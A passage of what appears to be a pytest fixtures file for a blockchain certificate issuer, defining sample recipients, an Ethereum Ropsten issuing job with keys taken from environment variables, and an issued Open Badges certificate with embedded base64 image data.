xDGFMcZGaPZUTIXL+7To0d7wkqrwQS5+bt1fUM5Jk6dNtrWMuD79h3k2PdxnM//F5WHAh7EWF2vHRMczE2KCALXEwJOkgLBiVNn+kwrGFzvz5dWvgeppyBgRkD7ZKQ4ydCVQi6AwYPG0kGOaDgXf155TpcsWVyFjMFr3Ur2sydyt25vsiHjCodpBSYZcCYazX4XGzkUD+Fb0TFRhJULuzOhKVw4v9Ut5LggIAgIAoKAICAIOEBAk4wUmS7xV0+k3R495h1OsrSZRnJWN+QYwP6OHXuofoNaHIXS2K93tcproRRaJ/dCul4k25k5cwHFcyx2hvQZVIgWls5FyJaIICAICAKCgCAgCLiPQKohGfrR0OkjjeusWYto2tR57K9xjmYyQUC62Rc7PKsWqNFlsfWQDE90iT/Hz9WcQ37UBxNVRAtCMbPGxHA61obid2EGUfYFAUFAEBAEBIEkQCDVkQw8I5KgIC97bU7SgrBSWDSQ9W4I592fwVEgPV5ul5DgBPxCcQwkYUpA6Ie9P3IWuXF0lFMh6+kXJEmB3wUSxYgIAoKAICAICAKCQNIikGp8MgI9JvwuQDCOcPY7EIYYdtSEtQOL/5w+9Rc7ib6tknHNmDlWrZ0wmpc03rRpK/tdxCu/i0KF8nGZF8XvIhDIck4QEAQEAUFAEHAJAe2TkSZIhn5mTH18MBJTH3FqFc4YdtyswqvRfb32G7rCiTKeqP8orwy6nKdYLii/i2zZb+REX+J3ofGTrSAgCAgCgoAgkBwIpEmSAWDgxDlt2lyaNXORyq+RLl2kIhxYhTUDp8dFnn8k9Gp+ze8CUy8igoAgIAgIAoKAIJB8CKRZkqEhgo/GqA8m8aqC3xpLjsOyUa1aBWrX/hnxu9BAyVYQEAQEAUFAEEhmBNI8ydB47dy5l15s35MX7spMY8a8l2pz8ev6ylYQEAQEAUFAELjeEbhuSMb1/kXJ8wkCgoAgIAgIAmkNAU0yItNaxaW+goAgIAgIAoKAIJA2EADJOJc2qiq1FAQEAUFAEBAEBIG0gABbMuJRT5CM42mhwlJHQUAQEAQEAUFAEEgbCGTMmFFxi0hOxS0kI218Z1JLQUAQEAQEAUEgLSAQz9xCzZJE8tofW9NCjaWOgoAgIAgIAoKAIJD6EWCCYfAKTJfMT/1VlhoKAoKAICAICAKCQFpAgEmGwSsi2JIRySud/sbbHGmh8lJHQUAQEAQEAUFAEEidCDDBuJouXbqCmTNnPoIawieDl/24OiR1VldqJQgIAoKAICAICAJpCIHPNcFAndXi6EwyMrE14wBv86ahB5GqCgKCgCAgCAgCgkAqQYCNFv+lT5/+7kyZMh3UVVLJuPjERT7QTR+UrSAgCAgCgoAgIAgIAk4QYC4x2EwwcK0iGdiJiYmZwwUGYl9EEBAEBAFBQBAQBAQBBwgsiYqKes23vJou0Qd5uiSCp02m87aJPiZbQUAQEAQEAUFAEBAErBBgA8X26OjoaryN8y1jWDJwggtc5YJPi0XDFyb5LAgIAoKAICAICAK+CDBfmMu8obI/goGyXiQDB0A0eOqkL28b89/POCYiCAgCgoAgIAgIAoKACQGsTdKTCQa4wnnTca9dr+kSrzP8AVEn8fHxnVlBD96XPBq+AMlnQUAQEAQEAUHg/wuB88wJJvIjx7JB4mSwRw9IMvTFTDAimWxU4M/1WXlp/nwb7+MvWpeRrSAgCAgCgoAgIAhcPwhwf3+R+/vfeIs1zvZGRkYuzJIly0oct/uU/wOyc8ss0o7O0QAAAABJRU5ErkJggg==" class="sc-jzJRlG bvIClq" style="width: 179px; height: 28px;" width="179" height="28" /></div>',
})
@pytest.fixture
def three_recipients() -> List:
yield [
AttrDict({
"name": "Phaws",
"identity": "phaws@mail.com",
"pubkey": "ecdsa-koblitz-pubkey:123ghj123ghj123",
"additional_fields": OrderedDict(displayHtml=""),
}),
AttrDict({
"name": "John",
"identity": "jack@mail.com",
"pubkey": "-",
"additional_fields": OrderedDict(displayHtml=""),
}),
AttrDict({
"name": "Ben",
"identity": "ben@mail.com",
"pubkey": "-",
"additional_fields": OrderedDict(displayHtml=""),
})
]
@pytest.fixture
def job() -> Dict:
yield AttrDict(
dict(
blockchain="ethereum_ropsten",
gas_price=20000000000,
gas_limit=25000, # Less than this won't work!
)
)
@pytest.fixture
def job_custom_keypair_1(job) -> Dict:
yield AttrDict(
dict(
job,
eth_public_key=os.environ.get('ETH_PUBLIC_KEY_2'),
eth_private_key=os.environ.get('ETH_PRIVATE_KEY_2'),
eth_key_created_at='2019-02-26T23:37:07.464654+00:00',
)
)
@pytest.fixture
def job_custom_keypair_2(job) -> Dict:
yield AttrDict(
dict(
job,
eth_public_key=os.environ.get('ETH_PUBLIC_KEY_3'),
eth_private_key=os.environ.get('ETH_PRIVATE_KEY_3'),
eth_key_created_at='2019-01-26T23:37:07.464654+00:00',
)
)
@pytest.fixture
def issued_cert() -> Dict:
yield {'@context': ['https://w3id.org/openbadges/v2', 'https://w3id.org/blockcerts/v2',
{'displayHtml': {'@id': 'schema:description'}}],
'badge': {'criteria': {'narrative': 'Candidates are tested on...'},
'description': 'Operators know how to run the plant.',
'id': 'urn:uuid:123Y-UI12-3YUI',
'image': 'data:image/png;base64,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